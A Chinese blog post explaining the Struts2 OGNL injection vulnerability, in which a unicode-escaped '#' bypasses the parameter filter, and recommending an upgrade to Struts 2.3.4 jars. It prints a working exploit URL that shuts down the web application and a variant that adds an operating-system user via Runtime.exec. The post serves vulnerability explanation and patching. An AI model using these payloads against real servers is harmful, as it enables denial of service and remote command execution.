java struts2 漏洞_struts2漏洞原理及解决办法

最新推荐文章于 2024-08-07 15:16:36 发布
最新推荐文章于 2024-08-07 15:16:36 发布
阅读量410 收藏
点赞数
文章标签: java struts2 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34791959/article/details/114208795
版权

1、原理

Struts2的核心是使用的webwork框架,处理action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数:

?user.address.city=Bishkek&user['favoriteDrink']=kumys

ONGL将它转换为:

action.getUser().getAddress().setCity("Bishkek")

action.getUser().setFavoriteDrink("kumys")

这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。

为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:

此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

转义后是这样:

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

OGNL处理时最终的结果就是

java.lang.Runtime.getRuntime().exit(1);  //关闭程序,即将web程序关闭

类似的可以执行

java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");//增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换空格,%2F替换/)

只要有权限就可以执行任何DOS命令。

2、解决方法

网上很多文章都介绍了三种解决方法,个人觉得将struts2的jar包更新到最新版本最简单,不用更改任何程序代码,目前最新版本2.3.4

下载到的更新包中有很多jar包,我系统中主要用到以下几个替换掉旧版本的:

commons-lang3-3.1.jar        (保留commons-lang-2.6.jar)

javassist-3.11.0.GA.jar        (新加包)

ognl-3.0.5.jar                (替换旧版本)

struts2-core-2.3.4.1.jar       (替换旧版本)

xwork-core-2.3.4.1.jar         (替换旧版本)

商宏伟
关注
Struts2漏洞
2403_82795493的博客
02-20 2534
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
K8_Struts2_漏洞利用工具解压密码:k8team
09-26
标题中的"K8_Struts2_漏洞利用工具"是一个专门为测试和研究这些漏洞而设计的工具。它可以帮助安全研究人员和开发者了解漏洞的工作原理,以及如何检测和防御此类攻击。使用这个工具,用户可以模拟攻击者的行为,检查...
Struts2 安全漏洞解决方法
09-15
Struts2 安全漏洞解析,距离上个版本发布仅仅过去1周,apache struts官网又发布struts2最新版本安全公告,主要修复了一个漏洞,代号S2-022:从漏洞简要描述来看,确定是对之前S2-021的补充。
Struts2教程1:第一个Struts2程序
ncsm_century的专栏
04-29 431
在本系列教程中我们将学习到Struts2的各种技术。在本教程中使用的工具和程序库的版本如下: 开发工具:MyEclipse6Web服务器:Tomcat6Struts版本:Struts2.0.11.1JDK版本:JDK1.5.0_12J2EE版本:Java EE5.0在本系列教程中Web工程的上下文路径都是struts2,如果在Web根目录有一个index.jsp文件,则访问路径如下:http://
Apache Struts 2框架漏洞
最新发布
qq_68186313的博客
08-07 218
漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置 或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。2、在url处输⼊ http://192.168.56.134:8080/struts2- showcase/ ${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。1、访问IP:PORT/struts2-showcase。3、将上⾯验证payload的值修改为我们的利⽤exp。
Struts2漏洞分析
z69183787的专栏
09-03 2745
当在浏览器输入如下地址时:        http://www.xxxx.com/aaa.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')
关于struts2漏洞问题及解决办法
iteye_2294的博客
07-28 281
   关于Struts2漏洞引起的问题我就不详细细说了,最近在各大网站及论坛上都有描述,上面都列出了具体的解决办法对策,对我来说,刚好遇到有现实的案例去解决,在参考了各大论坛、博客的文档之后做下总结,从Struts2.0.11升级到Struts2.3.15的经历,之间看了很多的博客,大概花了半天的时间,基本解决了问题。废话不多说直接来操作吧。    首先肯定要升级struts2的版本,官方2...
Struts2漏洞检查工具2018版.rar
03-31
Struts2是一款非常流行的开源Java框架,用于构建企业级Web应用程序。它基于Model-View-Controller(MVC)设计模式,极大地简化了开发过程。然而,由于其广泛的使用,Struts2也成为了黑客攻击的目标,因为其历史上...
Struts2漏洞利用工具2019版 V2.3.zip
09-11
Struts2是一款非常流行的开源Java Web框架,它提供了一种模型-视图-控制器(MVC)架构,帮助开发者构建可维护性和可扩展性良好的Web应用程序。然而,随着时间的推移,Struts2框架出现了一些安全漏洞,这些漏洞可能被...
Struts2 漏洞分析及如何提前预防
09-02
漏洞原理在于Struts2的OGNL(Object-Graph Navigation Language)表达式语言的滥用。OGNL是一种强大的表达式语言,可以访问和操作对象的属性,执行方法,以及进行类型转换。攻击者可以通过OGNL表达式来访问Java...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
Apache Struts2是一款非常流行的Java Web开发框架,它为开发者提供了构建MVC(Model-View-Controller)架构的便捷工具。然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-...
Struts2的bug----------关于Struts2中找不到Action的
03-22
NULL 博文链接:https://tianhandigeng.iteye.com/blog/995031
Struts2低版本安全漏洞解决办法
01-12
Struts2低版本安全漏洞解决办法 Struts2低版本安全漏洞解决办法
Struts2 漏洞彻底解决办法
weixin_33827965的博客
03-16 309
为什么80%的码农都做不了架构师?>>> ...
struts2危险漏洞解决方法
xuan2717的博客
08-08 109
struts2危险漏洞解决方法
java struts2 漏洞_Struts2漏洞简述
weixin_32540109的博客
02-13 611
S2-005漏洞S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。S2-005则是绕过官方的安全配置(禁止静态方法调用和类方法执行),再次造成漏洞。Payload如下:http://www.xxxx.com/aaa.action...
java struts漏洞_Struts2再爆远程代码执行漏洞
weixin_35508482的博客
02-15 171
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。摘要官方安全公告给出了编号和简要介绍“A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution”但是并没有说原理...
java struts2 漏洞_struts2漏洞列表
weixin_29080033的博客
02-16 253
【官方ID】S2-001【危害等级】高【受影响版本】WebWork 2.1(开启altSyntax)WebWork 2.2.0 – WebWork 2.2.5Struts 2.0.0 – Struts 2.0.8【漏洞描述】altSyntax特性默认不开启,开启后,允许在文本串中注入OGNL表达式,且注入的表达式被逐层递归执行。攻击者可以在HTML中text域输入OGNL表达式,当form在服务器...
STRUTS2 getClassLoader漏洞深度分析
0x02 漏洞原理Struts2框架中,当用户提交的数据被解析为OGNL表达式时,如果没有正确地限制和过滤,攻击者可以尝试注入恶意的类路径,利用getClassLoader()方法获取到当前Action的类加载器。一旦获得类加载器,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值